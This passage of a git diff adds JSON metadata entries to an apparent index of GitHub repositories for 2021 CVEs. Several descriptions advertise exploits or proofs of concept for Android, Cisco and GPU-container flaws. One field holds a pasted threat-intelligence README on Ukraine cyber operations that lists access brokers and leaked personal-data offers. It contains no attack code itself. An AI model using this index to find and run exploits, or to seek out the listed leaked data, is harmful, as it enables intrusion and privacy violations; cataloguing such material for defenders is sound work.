"https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2021-0705", + "description": null, + "fork": false, + "created_at": "2022-04-23T04:47:32Z", + "updated_at": "2023-03-27T01:33:47Z", + "pushed_at": "2022-04-23T05:02:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0928.json b/2021/CVE-2021-0928.json new file mode 100644 index 0000000000..dd3f98b938 --- /dev/null +++ b/2021/CVE-2021-0928.json @@ -0,0 +1,33 @@ +[ + { + "id": 453362563, + "name": "ReparcelBug2", + "full_name": "michalbednarski\/ReparcelBug2", + "owner": { + "login": "michalbednarski", + "id": 1826899, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1826899?v=4", + "html_url": "https:\/\/github.com\/michalbednarski", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/michalbednarski\/ReparcelBug2", + "description": "Writeup and exploit for installed app to system privilege escalation on Android 12 Beta through CVE-2021-0928, a `writeToParcel`\/`createFromParcel` serialization mismatch in `OutputConfiguration`", + "fork": false, + "created_at": "2022-01-29T10:14:32Z", + "updated_at": "2024-11-07T07:36:42Z", + "pushed_at": "2022-03-03T17:50:03Z", + "stargazers_count": 109, + "watchers_count": 109, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 20, + "watchers": 109, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0954.json b/2021/CVE-2021-0954.json new file mode 100644 index 0000000000..e4b0d08fc7 --- /dev/null +++ b/2021/CVE-2021-0954.json @@ -0,0 +1,33 @@ +[ + { + "id": 485231470, + "name": "framework_base_AOSP10_r33_CVE-2021-0954", + "full_name": "nanopathi\/framework_base_AOSP10_r33_CVE-2021-0954", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/framework_base_AOSP10_r33_CVE-2021-0954", + "description": null, + "fork": false, + "created_at": "2022-04-25T05:13:39Z", + "updated_at": "2022-04-25T05:22:56Z", + "pushed_at": "2022-04-25T05:33:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0963.json b/2021/CVE-2021-0963.json new file mode 100644 index 0000000000..6175d85423 --- /dev/null +++ b/2021/CVE-2021-0963.json @@ -0,0 +1,33 @@ +[ + { + "id": 486966400, + "name": "packages_apps_KeyChain_AOSP10_r33_CVE-2021-0963", + "full_name": "Trinadh465\/packages_apps_KeyChain_AOSP10_r33_CVE-2021-0963", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/packages_apps_KeyChain_AOSP10_r33_CVE-2021-0963", + "description": null, + "fork": false, + "created_at": "2022-04-29T12:36:35Z", + "updated_at": "2022-04-29T12:38:34Z", + "pushed_at": "2022-04-29T12:39:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-10086.json b/2021/CVE-2021-10086.json new file mode 100644 index 0000000000..157b43c8e2 --- /dev/null +++ b/2021/CVE-2021-10086.json @@ -0,0 +1,33 @@ +[ + { + "id": 432034471, + "name": "CVE-2021-10086", + "full_name": "AK-blank\/CVE-2021-10086", + "owner": { + "login": "AK-blank", + "id": 56591429, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56591429?v=4", + "html_url": "https:\/\/github.com\/AK-blank", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AK-blank\/CVE-2021-10086", + "description": null, + "fork": false, + "created_at": "2021-11-26T02:43:58Z", + "updated_at": "2023-04-28T02:53:28Z", + "pushed_at": "2021-08-05T06:47:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-1056.json b/2021/CVE-2021-1056.json new file mode 100644 index 0000000000..73341bdd27 --- /dev/null +++ b/2021/CVE-2021-1056.json @@ -0,0 +1,37 @@ +[ + { + "id": 327884232, + "name": "CVE-2021-1056", + "full_name": "pokerfaceSad\/CVE-2021-1056", + "owner": { + "login": "pokerfaceSad", + "id": 22297037, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22297037?v=4", + "html_url": "https:\/\/github.com\/pokerfaceSad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pokerfaceSad\/CVE-2021-1056", + "description": "PoC for CVE-2021-1056, related to GPU Container Security", + "fork": false, + "created_at": "2021-01-08T11:29:48Z", + "updated_at": "2024-08-12T20:09:14Z", + "pushed_at": "2021-01-12T09:21:02Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-1056", + "gpu-container", + "kubernetes-clusters" + ], + "visibility": "public", + "forks": 7, + "watchers": 15, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-1366.json b/2021/CVE-2021-1366.json new file mode 100644 index 0000000000..bfc9d2d60d --- /dev/null +++ b/2021/CVE-2021-1366.json @@ -0,0 +1,33 @@ +[ + { + "id": 688868813, + "name": "CVE-2021-1366", + "full_name": "koztkozt\/CVE-2021-1366", + "owner": { + "login": "koztkozt", + "id": 96878659, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96878659?v=4", + "html_url": "https:\/\/github.com\/koztkozt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/koztkozt\/CVE-2021-1366", + "description": "Cisco AnyConnect Posture (HostScan) Local Privilege Escalation: CVE-2021-1366", + "fork": false, + "created_at": "2023-09-08T09:20:20Z", + "updated_at": "2023-09-08T09:45:12Z", + "pushed_at": "2023-09-08T09:55:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-1480.json b/2021/CVE-2021-1480.json new file mode 100644 index 0000000000..6cba38abba --- /dev/null +++ b/2021/CVE-2021-1480.json @@ -0,0 +1,33 @@ +[ + { + "id": 390713933, + "name": "sdwan-cve-2021-1480", + "full_name": "xmco\/sdwan-cve-2021-1480", + "owner": { + "login": "xmco", + "id": 20705504, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20705504?v=4", + "html_url": "https:\/\/github.com\/xmco", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xmco\/sdwan-cve-2021-1480", + "description": "PoC materials to exploit the CVE-2021-1480 on Cico SD-WAN.", + "fork": false, + "created_at": "2021-07-29T12:17:50Z", + "updated_at": "2024-08-12T20:15:06Z", + "pushed_at": "2021-08-02T16:14:44Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-1497.json b/2021/CVE-2021-1497.json new file mode 100644 index 0000000000..7b42fc14ef --- /dev/null +++ b/2021/CVE-2021-1497.json @@ -0,0 +1,33 @@ +[ + { + "id": 577662602, + "name": "APT-Backpack", + "full_name": "34zY\/APT-Backpack", + "owner": { + "login": "34zY", + "id": 55347142, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55347142?v=4", + "html_url": "https:\/\/github.com\/34zY", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/34zY\/APT-Backpack", + "description": "cve-2019-11510, cve-2019-19781, cve-2020-5902,               cve-2021-1497, cve-2021-20090, cve-2021-22006, cve-2021-22205, cve-2021-26084, cve-2021-26855, cve-2021-26857, cve-2021–26857, cve-2021–26858, cve-2021–26865", + "fork": false, + "created_at": "2022-12-13T08:41:44Z", + "updated_at": "2024-11-05T01:37:50Z", + "pushed_at": "2023-04-19T17:10:15Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-1585.json b/2021/CVE-2021-1585.json new file mode 100644 index 0000000000..ce919254e1 --- /dev/null +++ b/2021/CVE-2021-1585.json @@ -0,0 +1,38 @@ +[ + { + "id": 457959361, + "name": "staystaystay", + "full_name": "jbaines-r7\/staystaystay", + "owner": { + "login": "jbaines-r7", + "id": 91965877, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91965877?v=4", + "html_url": "https:\/\/github.com\/jbaines-r7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jbaines-r7\/staystaystay", + "description": "Proof of Concept for CVE-2021-1585: Cisco ASA Device Manager RCE", + "fork": false, + "created_at": "2022-02-10T21:52:24Z", + "updated_at": "2023-10-18T07:49:23Z", + "pushed_at": "2022-08-15T18:13:20Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cisco", + "cve-2021-1585", + "exploit", + "poc" + ], + "visibility": "public", + "forks": 4, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-1636.json b/2021/CVE-2021-1636.json new file mode 100644 index 0000000000..862c5ff1fd --- /dev/null +++ b/2021/CVE-2021-1636.json @@ -0,0 +1,33 @@ +[ + { + "id": 466052267, + "name": "bug-free-memory", + "full_name": "Nate0634034090\/bug-free-memory", + "owner": { + "login": "Nate0634034090", + "id": 95479220, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95479220?v=4", + "html_url": "https:\/\/github.com\/Nate0634034090", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nate0634034090\/bug-free-memory", + "description": " ​![​logo​](https:\/\/github.com\/curated-intel\/Ukraine-Cyber-Operations\/blob\/main\/ci-logo.png) ​#​ ​Ukraine-Cyber-Operations ​Curated Intelligence is working with analysts from around the world to provide useful information to organisations in Ukraine looking for additional free threat intelligence. Slava Ukraini. Glory to Ukraine. ([​Blog​](https:\/\/www.curatedintel.org\/2021\/08\/welcome.html) | [​Twitter​](https:\/\/twitter.com\/CuratedIntel) | [​LinkedIn​](https:\/\/www.linkedin.com\/company\/curatedintelligence\/)) ​![​timeline​](https:\/\/github.com\/curated-intel\/Ukraine-Cyber-Operations\/blob\/main\/uacyberopsv2.png) ​![​cyberwar​](https:\/\/github.com\/curated-intel\/Ukraine-Cyber-Operations\/blob\/main\/Russia-Ukraine%20Cyberwar.png) ​###​ ​Analyst Comments: ​-​ 2022-02-25 ​  ​-​ Creation of the initial repository to help organisations in Ukraine ​  ​-​ Added [​Threat Reports​](https:\/\/github.com\/curated-intel\/Ukraine-Cyber-Operations#threat-reports) section ​  ​-​ Added [​Vendor Support​](https:\/\/github.com\/curated-intel\/Ukraine-Cyber-Operations#vendor-support) section ​-​ 2022-02-26 ​  ​-​ Additional resources, chronologically ordered (h\/t Orange-CD) ​  ​-​ Added [​Vetted OSINT Sources​](https:\/\/github.com\/curated-intel\/Ukraine-Cyber-Operations#vetted-osint-sources) section  ​  ​-​ Added [​Miscellaneous Resources​](https:\/\/github.com\/curated-intel\/Ukraine-Cyber-Operations#miscellaneous-resources) section ​-​ 2022-02-27 ​  ​-​ Additional threat reports have been added ​  ​-​ Added [​Data Brokers​](https:\/\/github.com\/curated-intel\/Ukraine-Cyber-Operations\/blob\/main\/README.md#data-brokers) section ​  ​-​ Added [​Access Brokers​](https:\/\/github.com\/curated-intel\/Ukraine-Cyber-Operations\/blob\/main\/README.md#access-brokers) section ​-​ 2022-02-28 ​  ​-​ Added Russian Cyber Operations Against Ukraine Timeline by ETAC ​  ​-​ Added Vetted and Contextualized [​Indicators of Compromise (IOCs)​](https:\/\/github.com\/curated-intel\/Ukraine-Cyber-Operations\/blob\/main\/ETAC_Vetted_UkraineRussiaWar_IOCs.csv) by ETAC ​-​ 2022-03-01 ​  ​-​ Additional threat reports and resources have been added ​-​ 2022-03-02 ​  ​-​ Additional [​Indicators of Compromise (IOCs)​](https:\/\/github.com\/curated-intel\/Ukraine-Cyber-Operations\/blob\/main\/ETAC_Vetted_UkraineRussiaWar_IOCs.csv#L2011) have been added ​  ​-​ Added vetted [​YARA rule collection​](https:\/\/github.com\/curated-intel\/Ukraine-Cyber-Operations\/tree\/main\/yara) from the Threat Reports by ETAC ​  ​-​ Added loosely-vetted [​IOC Threat Hunt Feeds​](https:\/\/github.com\/curated-intel\/Ukraine-Cyber-Operations\/tree\/main\/KPMG-Egyde_Ukraine-Crisis_Feeds\/MISP-CSV_MediumConfidence_Filtered) by KPMG-Egyde CTI (h\/t [​0xDISREL​](https:\/\/twitter.com\/0xDISREL)) ​    ​-​ IOCs shared by these feeds are ​`LOW-TO-MEDIUM CONFIDENCE`​ we strongly recommend NOT adding them to a blocklist ​    ​-​ These could potentially be used for ​`THREAT HUNTING`​ and could be added to a ​`WATCHLIST` ​    ​-​ IOCs are generated in ​`MISP COMPATIBLE`​ CSV format ​-​ 2022-03-03 ​  ​-​ Additional threat reports and vendor support resources have been added ​  ​-​ Updated [​Log4Shell IOC Threat Hunt Feeds​](https:\/\/github.com\/curated-intel\/Log4Shell-IOCs\/tree\/main\/KPMG_Log4Shell_Feeds) by KPMG-Egyde CTI; not directly related to Ukraine, but still a widespread vulnerability. ​  ​-​ Added diagram of Russia-Ukraine Cyberwar Participants 2022 by ETAC ​  ​-​ Additional [​Indicators of Compromise (IOCs)​](https:\/\/github.com\/curated-intel\/Ukraine-Cyber-Operations\/blob\/main\/ETAC_Vetted_UkraineRussiaWar_IOCs.csv#L2042) have been added ​####​ ​`Threat Reports` ​| Date | Source | Threat(s) | URL | ​| --- | --- | --- | --- | ​| 14 JAN | SSU Ukraine | Website Defacements | [ssu.gov.ua](https:\/\/ssu.gov.ua\/novyny\/sbu-rozsliduie-prychetnist-rosiiskykh-spetssluzhb-do-sohodnishnoi-kiberataky-na-orhany-derzhavnoi-vlady-ukrainy)| ​| 15 JAN | Microsoft | WhisperGate wiper (DEV-0586) | [microsoft.com](https:\/\/www.microsoft.com\/security\/blog\/2022\/01\/15\/destructive-malware-targeting-ukrainian-organizations\/) | ​| 19 JAN | Elastic | WhisperGate wiper (Operation BleedingBear) | [elastic.github.io](https:\/\/elastic.github.io\/security-research\/malware\/2022\/01\/01.operation-bleeding-bear\/article\/) | ​| 31 JAN | Symantec | Gamaredon\/Shuckworm\/PrimitiveBear (FSB) | [symantec-enterprise-blogs.security.com](https:\/\/symantec-enterprise-blogs.security.com\/blogs\/threat-intelligence\/shuckworm-gamaredon-espionage-ukraine) | ​| 2 FEB | RaidForums | Access broker \"GodLevel\" offering Ukrainain algricultural exchange | RaidForums [not linked] | ​| 2 FEB | CERT-UA | UAC-0056 using SaintBot and OutSteel malware | [cert.gov.ua](https:\/\/cert.gov.ua\/article\/18419) | ​| 3 FEB | PAN Unit42 | Gamaredon\/Shuckworm\/PrimitiveBear (FSB) | [unit42.paloaltonetworks.com](https:\/\/unit42.paloaltonetworks.com\/gamaredon-primitive-bear-ukraine-update-2021\/) | ​| 4 FEB | Microsoft | Gamaredon\/Shuckworm\/PrimitiveBear (FSB) | [microsoft.com](https:\/\/www.microsoft.com\/security\/blog\/2022\/02\/04\/actinium-targets-ukrainian-organizations\/) | ​| 8 FEB | NSFOCUS | Lorec53 (aka UAC-0056, EmberBear, BleedingBear) | [nsfocusglobal.com](https:\/\/nsfocusglobal.com\/apt-retrospection-lorec53-an-active-russian-hack-group-launched-phishing-attacks-against-georgian-government) | ​| 15 FEB | CERT-UA | DDoS attacks against the name server of government websites as well as Oschadbank (State Savings Bank) & Privatbank (largest commercial bank). False SMS and e-mails to create panic | [cert.gov.ua](https:\/\/cert.gov.ua\/article\/37139) | ​| 23 FEB | The Daily Beast | Ukrainian troops receive threatening SMS messages | [thedailybeast.com](https:\/\/www.thedailybeast.com\/cyberattacks-hit-websites-and-psy-ops-sms-messages-targeting-ukrainians-ramp-up-as-russia-moves-into-ukraine) | ​| 23 FEB | UK NCSC | Sandworm\/VoodooBear (GRU) | [ncsc.gov.uk](https:\/\/www.ncsc.gov.uk\/files\/Joint-Sandworm-Advisory.pdf) | ​| 23 FEB | SentinelLabs | HermeticWiper | [sentinelone.com]( https:\/\/www.sentinelone.com\/labs\/hermetic-wiper-ukraine-under-attack\/ ) | ​| 24 FEB | ESET | HermeticWiper | [welivesecurity.com](https:\/\/www.welivesecurity.com\/2022\/02\/24\/hermeticwiper-new-data-wiping-malware-hits-ukraine\/) | ​| 24 FEB | Symantec | HermeticWiper, PartyTicket ransomware, CVE-2021-1636, unknown webshell | [symantec-enterprise-blogs.security.com](https:\/\/symantec-enterprise-blogs.security.com\/blogs\/threat-intelligence\/ukraine-wiper-malware-russia) | ​| 24 FEB | Cisco Talos | HermeticWiper | [blog.talosintelligence.com](https:\/\/blog.talosintelligence.com\/2022\/02\/threat-advisory-hermeticwiper.html) | ​| 24 FEB | Zscaler | HermeticWiper | [zscaler.com](https:\/\/www.zscaler.com\/blogs\/security-research\/hermetic-wiper-resurgence-targeted-attacks-ukraine) | ​| 24 FEB | Cluster25 | HermeticWiper | [cluster25.io](https:\/\/cluster25.io\/2022\/02\/24\/ukraine-analysis-of-the-new-disk-wiping-malware\/) | ​| 24 FEB | CronUp | Data broker \"FreeCivilian\" offering multiple .gov.ua | [twitter.com\/1ZRR4H](https:\/\/twitter.com\/1ZRR4H\/status\/1496931721052311557)| ​| 24 FEB | RaidForums | Data broker \"Featherine\" offering diia.gov.ua | RaidForums [not linked] | ​| 24 FEB | DomainTools | Unknown scammers | [twitter.com\/SecuritySnacks](https:\/\/twitter.com\/SecuritySnacks\/status\/1496956492636905473?s=20&t=KCIX_1Ughc2Fs6Du-Av0Xw) | ​| 25 FEB | @500mk500 | Gamaredon\/Shuckworm\/PrimitiveBear (FSB) | [twitter.com\/500mk500](https:\/\/twitter.com\/500mk500\/status\/1497339266329894920?s=20&t=opOtwpn82ztiFtwUbLkm9Q) | ​| 25 FEB | @500mk500 | Gamaredon\/Shuckworm\/PrimitiveBear (FSB) | [twitter.com\/500mk500](https:\/\/twitter.com\/500mk500\/status\/1497208285472215042)| ​| 25 FEB | Microsoft | HermeticWiper | [gist.github.com](https:\/\/gist.github.com\/fr0gger\/7882fde2b1b271f9e886a4a9b6fb6b7f) | ​| 25 FEB | 360 NetLab | DDoS (Mirai, Gafgyt, IRCbot, Ripprbot, Moobot) | [blog.netlab.360.com](https:\/\/blog.netlab.360.com\/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days\/) | ​| 25 FEB | Conti [themselves] | Conti ransomware, BazarLoader | Conti News .onion [not linked] | ​| 25 FEB | CoomingProject [themselves] | Data Hostage Group | CoomingProject Telegram [not linked] | ​| 25 FEB | CERT-UA | UNC1151\/Ghostwriter (Belarus MoD) | [CERT-UA Facebook](https:\/\/facebook.com\/story.php?story_fbid=312939130865352&id=100064478028712)| ​| 25 FEB | Sekoia | UNC1151\/Ghostwriter (Belarus MoD) | [twitter.com\/sekoia_io](https:\/\/twitter.com\/sekoia_io\/status\/1497239319295279106) | ​| 25 FEB | @jaimeblascob | UNC1151\/Ghostwriter (Belarus MoD) | [twitter.com\/jaimeblasco](https:\/\/twitter.com\/jaimeblascob\/status\/1497242668627370009)| ​| 25 FEB | RISKIQ | UNC1151\/Ghostwriter (Belarus MoD) | [community.riskiq.com](https:\/\/community.riskiq.com\/article\/e3a7ceea\/) | ​| 25 FEB | MalwareHunterTeam | Unknown phishing | [twitter.com\/malwrhunterteam](https:\/\/twitter.com\/malwrhunterteam\/status\/1497235270416097287) | ​| 25 FEB | ESET | Unknown scammers | [twitter.com\/ESETresearch](https:\/\/twitter.com\/ESETresearch\/status\/1497194165561659394) | ​| 25 FEB | BitDefender | Unknown scammers | [blog.bitdefender.com](https:\/\/blog.bitdefender.com\/blog\/hotforsecurity\/cybercriminals-deploy-spam-campaign-as-tens-of-thousands-of-ukrainians-seek-refuge-in-neighboring-countries\/) | ​| 25 FEB | SSSCIP Ukraine | Unkown phishing | [twitter.com\/dsszzi](https:\/\/twitter.com\/dsszzi\/status\/1497103078029291522) | ​| 25 FEB | RaidForums | Data broker \"NetSec\"  offering FSB (likely SMTP accounts) | RaidForums [not linked] | ​| 25 FEB | Zscaler | PartyTicket decoy ransomware | [zscaler.com](https:\/\/www.zscaler.com\/blogs\/security-research\/technical-analysis-partyticket-ransomware) | ​| 25 FEB | INCERT GIE | Cyclops Blink, HermeticWiper | [linkedin.com](https:\/\/www.linkedin.com\/posts\/activity-6902989337210740736-XohK) [Login Required] | ​| 25 FEB | Proofpoint | UNC1151\/Ghostwriter (Belarus MoD) | [twitter.com\/threatinsight](https:\/\/twitter.com\/threatinsight\/status\/1497355737844133895?s=20&t=Ubi0tb_XxGCbHLnUoQVp8w) | ​| 25 FEB | @fr0gger_ | HermeticWiper capabilities Overview | [twitter.com\/fr0gger_](https:\/\/twitter.com\/fr0gger_\/status\/1497121876870832128?s=20&t=_296n0bPeUgdXleX02M9mg) ​| 26 FEB | BBC Journalist | A fake Telegram account claiming to be President Zelensky is posting dubious messages | [twitter.com\/shayan86](https:\/\/twitter.com\/shayan86\/status\/1497485340738785283?s=21) | ​| 26 FEB | CERT-UA | UNC1151\/Ghostwriter (Belarus MoD) | [CERT_UA Facebook](https:\/\/facebook.com\/story.php?story_fbid=313517477474184&id=100064478028712) | ​| 26 FEB | MHT and TRMLabs | Unknown scammers, linked to ransomware | [twitter.com\/joes_mcgill](https:\/\/twitter.com\/joes_mcgill\/status\/1497609555856932864?s=20&t=KCIX_1Ughc2Fs6Du-Av0Xw) | ​| 26 FEB | US CISA | WhisperGate wiper, HermeticWiper | [cisa.gov](https:\/\/www.cisa.gov\/uscert\/ncas\/alerts\/aa22-057a) | ​| 26 FEB | Bloomberg | Destructive malware (possibly HermeticWiper) deployed at Ukrainian Ministry of Internal Affairs & data stolen from Ukrainian telecommunications networks | [bloomberg.com](https:\/\/www.bloomberg.com\/news\/articles\/2022-02-26\/hackers-destroyed-data-at-key-ukraine-agency-before-invasion?sref=ylv224K8) | ​| 26 FEB | Vice Prime Minister of Ukraine | IT ARMY of Ukraine created to crowdsource offensive operations against Russian infrastructure | [twitter.com\/FedorovMykhailo](https:\/\/twitter.com\/FedorovMykhailo\/status\/1497642156076511233) | ​| 26 FEB | Yoroi | HermeticWiper | [yoroi.company](https:\/\/yoroi.company\/research\/diskkill-hermeticwiper-a-disruptive-cyber-weapon-targeting-ukraines-critical-infrastructures) | ​| 27 FEB | LockBit [themselves] | LockBit ransomware | LockBit .onion [not linked] |  ​| 27 FEB | ALPHV [themselves] | ALPHV ransomware | vHUMINT [closed source] | ​| 27 FEB | Mēris Botnet [themselves] | DDoS attacks | vHUMINT [closed source] | ​| 28 FEB | Horizon News [themselves] | Leak of China's Censorship Order about Ukraine | [TechARP](https:\/\/www-techarp-com.cdn.ampproject.org\/c\/s\/www.techarp.com\/internet\/chinese-media-leaks-ukraine-censor\/?amp=1)| ​| 28 FEB | Microsoft | FoxBlade (aka HermeticWiper) | [Microsoft](https:\/\/blogs.microsoft.com\/on-the-issues\/2022\/02\/28\/ukraine-russia-digital-war-cyberattacks\/?preview_id=65075) | ​| 28 FEB | @heymingwei | Potential BGP hijacks attempts against Ukrainian Internet Names Center | [https:\/\/twitter.com\/heymingwei](https:\/\/twitter.com\/heymingwei\/status\/1498362715198263300?s=20&t=Ju31gTurYc8Aq_yZMbvbxg) | ​| 28 FEB | @cyberknow20 | Stormous ransomware targets Ukraine Ministry of Foreign Affairs | [twitter.com\/cyberknow20](https:\/\/twitter.com\/cyberknow20\/status\/1498434090206314498?s=21) |  ​| 1 MAR | ESET | IsaacWiper and HermeticWizard | [welivesecurity.com](https:\/\/www.welivesecurity.com\/2022\/03\/01\/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine\/) | ​| 1 MAR | Proofpoint | Ukrainian armed service member's email compromised and sent malspam containing the SunSeed malware (likely TA445\/UNC1151\/Ghostwriter) | [proofpoint.com](https:\/\/www.proofpoint.com\/us\/blog\/threat-insight\/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails) | ​| 1 MAR | Elastic | HermeticWiper | [elastic.github.io](https:\/\/elastic.github.io\/security-research\/intelligence\/2022\/03\/01.hermeticwiper-targets-ukraine\/article\/) | ​| 1 MAR | CrowdStrike | PartyTicket (aka HermeticRansom), DriveSlayer (aka HermeticWiper) | [CrowdStrike](https:\/\/www.crowdstrike.com\/blog\/how-to-decrypt-the-partyticket-ransomware-targeting-ukraine\/) | ​| 2 MAR | Zscaler | DanaBot operators launch DDoS attacks against the Ukrainian Ministry of Defense | [zscaler.com](https:\/\/www.zscaler.com\/blogs\/security-research\/danabot-launches-ddos-attack-against-ukrainian-ministry-defense) | ​| 3 MAR | @ShadowChasing1 | Gamaredon\/Shuckworm\/PrimitiveBear (FSB) | [twitter.com\/ShadowChasing1](https:\/\/twitter.com\/ShadowChasing1\/status\/1499361093059153921) | ​| 3 MAR | @vxunderground | News website in Poland was reportedly compromised and the threat actor uploaded anti-Ukrainian propaganda | [twitter.com\/vxunderground](https:\/\/twitter.com\/vxunderground\/status\/1499374914758918151?s=20&t=jyy9Hnpzy-5P1gcx19bvIA) | ​| 3 MAR | @kylaintheburgh | Russian botnet on Twitter is pushing \"#istandwithputin\" and \"#istandwithrussia\" propaganda (in English) | [twitter.com\/kylaintheburgh](https:\/\/twitter.com\/kylaintheburgh\/status\/1499350578371067906?s=21) | ​| 3 MAR | @tracerspiff | UNC1151\/Ghostwriter (Belarus MoD) | [twitter.com](https:\/\/twitter.com\/tracerspiff\/status\/1499444876810854408?s=21) | ​####​ ​`Access Brokers` ​| Date | Threat(s) | Source | ​| --- | --- | --- | ​| 23 JAN | Access broker \"Mont4na\" offering UkrFerry | RaidForums [not linked] | ​| 23 JAN | Access broker \"Mont4na\" offering PrivatBank | RaidForums [not linked] | ​| 24 JAN | Access broker \"Mont4na\" offering DTEK | RaidForums [not linked] | ​| 27 FEB | KelvinSecurity Sharing list of IP cameras in Ukraine | vHUMINT [closed source] | ​| 28 FEB | \"w1nte4mute\" looking to buy access to UA and NATO countries (likely ransomware affiliate) | vHUMINT [closed source] | ​####​ ​`Data Brokers` ​| Threat Actor    | Type            | Observation                                                                                               | Validated | Relevance                     | Source                                                     | ​| --------------- | --------------- | --------------------------------------------------------------------------------------------------------- | --------- | ----------------------------- | ---------------------------------------------------------- | ​| aguyinachair    | UA data sharing | PII DB of ukraine.com (shared as part of a generic compilation)                                           | No        | TA discussion in past 90 days | ELeaks Forum \\[not linked\\]                                | ​| an3key          | UA data sharing | DB of Ministry of Communities and Territories Development of Ukraine (minregion\\[.\\]gov\\[.\\]ua)           | No        | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | ​| an3key          | UA data sharing | DB of Ukrainian Ministry of Internal Affairs (wanted\\[.\\]mvs\\[.\\]gov\\[.\\]ua)                              | No        | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | ​| CorelDraw       | UA data sharing | PII DB (40M) of PrivatBank customers (privatbank\\[.\\]ua)                                                  | No        | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | ​| CorelDraw       | UA data sharing | DB of \"border crossing\" DBs of DPR and LPR                                                                | No        | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | ​| CorelDraw       | UA data sharing | PII DB (7.5M) of Ukrainian passports                                                                      | No        | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | ​| CorelDraw       | UA data sharing | PII DB of Ukrainian car registration, license plates, Ukrainian traffic police records                    | No        | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | ​| CorelDraw       | UA data sharing | PII DB (2.1M) of Ukrainian citizens                                                                       | No        | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | ​| CorelDraw       | UA data sharing | 